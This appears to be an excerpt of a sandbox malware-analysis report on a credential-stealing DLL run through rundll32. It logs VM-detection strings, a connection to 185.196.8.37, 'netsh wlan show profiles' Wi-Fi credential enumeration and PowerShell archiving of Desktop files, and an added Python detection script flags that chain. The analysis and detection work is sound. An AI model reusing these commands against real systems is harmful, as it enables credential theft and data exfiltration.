    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (6 occurrences)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8342
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1220
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8307
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1216
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7587
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1980
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4692 Thread sleep count: 8342 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6028 Thread sleep count: 1220 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 608 Thread sleep time: -10145709240540247s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 756 Thread sleep time: -6456360425798339s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2464 Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (4 occurrences)
    Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
    Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\Music\desktop.ini
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
    Source: rundll32.exe, 00000005.00000003.1645210103.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1661438343.00000000031EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
    Source: rundll32.exe, 00000004.00000002.1680276783.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: rundll32.exe, 00000005.00000003.1645633393.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1661438343.00000000031AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1645210103.00000000031AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPG
    Source: rundll32.exe, 00000010.00000002.1748097265.00000000032CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWQ&
    Source: rundll32.exe, 00000004.00000002.1680276783.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1680276783.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1645210103.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1661438343.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1748097265.000000000323A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1748097265.00000000032CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: rundll32.exe, 00000010.00000002.1748097265.000000000323A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: rundll32.exe, 00000010.00000002.1748097265.000000000323A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~
    Source: netsh.exe, 00000006.00000003.1426267443.00000000006D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
    Source: rundll32.exe, 00000004.00000002.1680276783.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWB
    Source: netsh.exe, 00000008.00000003.1427038086.0000000001251000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.1497795560.0000000001491000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Note: "Hyper-V RAW" is the display name of the Hyper-V sockets (AF_HYPERV) Winsock provider that mswsock.dll registers on ordinary Windows 10 and later installs, so its presence in process memory is a weak virtualization indicator. The \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00 device instance path is a VMware guest artifact and is the stronger signal; the report shows these strings in memory, not that the sample acts on them.
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (3 occurrences)

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.196.8.37 80
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",#1
    Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles (3 occurrences)
    Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal (3 occurrences)
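Detection logic for the process chain recorded above (rundll32.exe loading a DLL from the user's Desktop by ordinal, then spawning `netsh wlan show profiles` and a PowerShell `Compress-Archive` that writes into the user's Temp directory), as an added example that is not part of the Joe Sandbox report or of the sample. The event records are constructed to mirror the report's "Process created" lines in Sysmon Event ID 1 style; the pid/ppid values and the benign `netsh` run from an interactive cmd.exe are assumptions, and the `key=clear` check covers the standard follow-up command that reveals a profile's key, which this report does not show. Alerts are raised only when one rundll32 subtree trips two or more distinct rules, which keeps a lone administrative `netsh wlan show profiles` from paging anyone.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcEvent:
    """Process-creation record (Sysmon Event ID 1 style, an assumption)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    pid: int
    detail: str


# Constructed events modelled on the report's "Process created" lines.
# Pids 5 and 6 are an assumed benign admin session used as a negative case.
SAMPLE_EVENTS = [
    ProcEvent(1, 0, r"C:\Windows\SysWOW64\cmd.exe", "cmd"),
    ProcEvent(2, 1, r"C:\Windows\SysWOW64\rundll32.exe",
              r'rundll32.exe "C:\Users\user\Desktop\cred.dll",#1'),
    ProcEvent(3, 2, r"C:\Windows\SysWOW64\netsh.exe", "netsh wlan show profiles"),
    ProcEvent(4, 2, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' "
              r"-DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' "
              r"-CompressionLevel Optimal"),
    ProcEvent(5, 0, r"C:\Windows\System32\cmd.exe", "cmd"),
    ProcEvent(6, 5, r"C:\Windows\System32\netsh.exe", "netsh wlan show profiles"),
]


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_rundll32_user_dll(ev: ProcEvent) -> Optional[Finding]:
    """rundll32 loading a DLL from under C:\\Users by ordinal (#N) or by name."""
    if _base(ev.image) != "rundll32.exe":
        return None
    m = re.search(r'"?([A-Za-z]:\\Users\\[^"]+?\.dll)"?\s*,\s*(#\d+|\w+)', ev.cmdline, re.I)
    if not m:
        return None
    return Finding("rundll32_user_dll", "medium", ev.pid, f"{m.group(1)} export {m.group(2)}")


def rule_wifi_profile_enum(ev: ProcEvent) -> Optional[Finding]:
    """netsh wlan show profile(s); key=clear on the follow-up dumps the PSK."""
    if _base(ev.image) != "netsh.exe":
        return None
    if not re.search(r"\bwlan\s+show\s+profiles?\b", ev.cmdline, re.I):
        return None
    sev = "high" if re.search(r"\bkey\s*=\s*clear\b", ev.cmdline, re.I) else "medium"
    return Finding("wifi_profile_enum", sev, ev.pid, ev.cmdline)


def rule_temp_archive(ev: ProcEvent) -> Optional[Finding]:
    """PowerShell Compress-Archive whose DestinationPath is under the user's Temp directory."""
    if _base(ev.image) != "powershell.exe":
        return None
    if not re.search(r"\bcompress-archive\b", ev.cmdline, re.I):
        return None
    m = re.search(r"-DestinationPath\s+'?([^'\s]+)", ev.cmdline, re.I)
    dest = m.group(1) if m else ""
    if not re.search(r"\\AppData\\Local\\Temp\\", dest, re.I):
        return None
    return Finding("temp_archive", "medium", ev.pid, dest)


RULES = (rule_rundll32_user_dll, rule_wifi_profile_enum, rule_temp_archive)


def scan(events):
    """Apply every rule to every event; returns findings in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            f = rule(ev)
            if f is not None:
                findings.append(f)
    return findings


def rundll32_root(pid, by_pid):
    """Walk up the parent chain and return the nearest rundll32.exe pid, or None."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        if _base(ev.image) == "rundll32.exe":
            return ev.pid
        pid = ev.ppid
    return None


def correlate(events):
    """Group findings under their rundll32 ancestor and alert when a single
    subtree trips two or more distinct rules (loader + credential access + staging)."""
    by_pid = {ev.pid: ev for ev in events}
    groups = {}
    for f in scan(events):
        root = rundll32_root(f.pid, by_pid)
        if root is not None:
            groups.setdefault(root, []).append(f)
    return {root: fs for root, fs in groups.items() if len({f.rule for f in fs}) >= 2}


if __name__ == "__main__":
    for root, fs in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT rundll32 pid {root}:")
        for f in fs:
            print(f"  [{f.severity}] {f.rule} pid={f.pid} {f.detail}")
```

The benign `netsh` under the interactive cmd.exe still produces a finding in `scan`, but `correlate` drops it because no rundll32.exe ancestor exists; in production the same grouping should key on whatever loader the environment sees (regsvr32.exe, mshta.exe, an Office process) rather than rundll32.exe alone.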
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
